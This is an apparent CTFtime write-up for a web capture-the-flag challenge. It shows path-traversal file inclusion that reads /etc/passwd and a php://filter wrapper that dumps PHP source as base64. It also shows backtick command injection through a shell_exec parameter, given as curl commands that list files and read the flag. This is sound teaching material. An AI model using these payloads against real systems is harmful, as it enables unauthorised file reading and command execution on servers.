CTFtime.org

Dababy

by Tok1omonster / Tok1omonster

Tags: web 

Rating: 5.0

Challenge URL: http://34.72.118.158:6284/

Inspect source will show there's two URLs more:
* http://34.72.118.158:6284/fun.php
* http://34.72.118.158:6284/fun1.php?file=suge

Try with: http://34.72.118.158:6284/fun1.php?file=../../../../../../etc/passwd => we can get content => LFI

Try: curl "http://34.72.118.158:6284/fun1.php?file=php://filter/convert.base64-encode/resource=fun.php" => we can get source code of fun.php
```
PD9waHAKc2Vzc2lvbl9zdGFydCgpOwo/Pgo8aHRtbAo8ZGl2IHN0eWxlPSJiYWNrZ3JvdW5kLWltYWdlOiB1cmwoJy9pbWcvZGFiYWJ5Mi5qcGcnKSIKaGVpZ2h0PSAxMDAlOwpiYWNrZ3JvdW5kLXNpemU6IGNvdmVyOwo8aGVhZD4KICA8dGl0bGU+RGFCYWJ5IENvb2wgTmFtZSBDb252ZXJ0YWJsZTwvdGl0bGU+CjwvaGVhZD4KPGJvZHk+CiAgICA8cD48Zm9ybSBhY3Rpb249ImZ1bi5waHAiIG1ldGhvZD0iZ2V0Ij4KICAgIDxiPkVudGVyIGEgY29vbCBuYW1lOiAgPC9iPgogICAgPHA+PC9wPgogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InN0cmluZyIgdmFsdWU9IllvdXIgbmFtZSEiPgogICAgPGlucHV0IHR5cGU9InN1Ym1pdCI+CiAgICA8cD48L3A+CiAgICA8Yj5EYWJhYnkncyBSZXNwb25zZTogIDwvYj4KICAgIDwvZm9ybT4KICAgIDw/cGhwCiAgICBzZXNzaW9uX3N0YXJ0KCk7CiAgICAkbmFtZSA9ICRfR0VUWydzdHJpbmcnXTsKICAgICRfU0VTU0lPTlsnY291bnQnXSA9ICFpc3NldCgkX1NFU1NJT05bJ2NvdW50J10pID8gMCA6ICRfU0VTU0lPTlsnY291bnQnXTsJICAgCiAgICBpZiAoc3RybGVuKCRuYW1lKSA+PSA0MCl7CgllY2hvICJEYWJhYnkgc2F5cyB0aGF0J3MgYSBsb25nIG5hbWUiOwogICAgfQogICAgZWxzZQogICAgeyAKICAgIGlmIChzdHJwb3MoJG5hbWUsICdscycpID09IGZhbHNlICYmIChzdHJwb3MoJG5hbWUsICc7JykgIT09IGZhbHNlIHx8IHN0cnBvcygkbmFtZSwgJyYnKSAhPT0gZmFsc2UgfHwgc3RycG9zKCRuYW1lLCAnfCcpICE9PSBmYWxzZSkpIHsKCgkgJF9TRVNTSU9OWydjb3VudCddKys7CiAgICAgICAgIGlmICgkX1NFU1NJT05bJ2NvdW50J10gPT0gMSl7CgkgZWNobyAiRGFiYWJ5IHNheSdzIG5vIHBlYWtpbmciOwoJIH0KCSBpZiAoJF9TRVNTSU9OWydjb3VudCddID09IDIpewoJIGVjaG8gIkRhYmFieSBzYWlkIG5vIHBlYWtpbmciOwkgCgkgfQogICAgICAgICBpZiAoJF9TRVNTSU9OWydjb3VudCddID49IDMpewoJCSBlY2hvICc8aW1nIHNyYz0iL2ltZy9kYWJhYnkzLmpwZyIgY2xhc3M9InJhdGluZyIgdGl0bGU9IlNwb29rIiBhbHQ9IlNwb29rIiAvPic7CgkgfQkgCiAgICB9CiAgICBlbHNlCiAgICB7CglpZiAoc3RycG9zKCRuYW1lLCAnc2VjcjN0JykgIT09IGZhbHNlKXsKCQllY2hvICJEYWJhYnkgc2F5J3Mgbm8gcGVha2luZyI7Cgl9CgllbHNlCgl7CgkkX1NFU1NJT05bJ2NvdW50J10gPSAwOwogICAgCWVjaG8gc2hlbGxfZXhlYygnZWNobyAnLiRfR0VUWydzdHJpbmcnXS4nIHwgeGFyZ3MgL3Zhci93d3cvaHRtbC9kYWJhYnkuc2gnKTsKCX0gICAgICAgCgl9CiAgICB9CiAgICA/PgogICAgPC9wPgo8L2JvZHk+CjwvaHRtbD4K
```

Decode source code we can see:
* strpos($name, 'ls') == false => PHP loose comparision
* shell_exec('echo '.$_GET['string'].' | xargs /var/www/html/dababy.sh'); => call to shell which can execute command ls

Try: curl -v -L "http://34.72.118.158:6284/fun.php?string=\`ls%20../\`" it will show: flag.txt Is a Cool Name Lesss Go!

Final: curl -v -L "http://34.72.118.158:6284/fun.php?string=\`cat%20../flag.txt\`"

Comments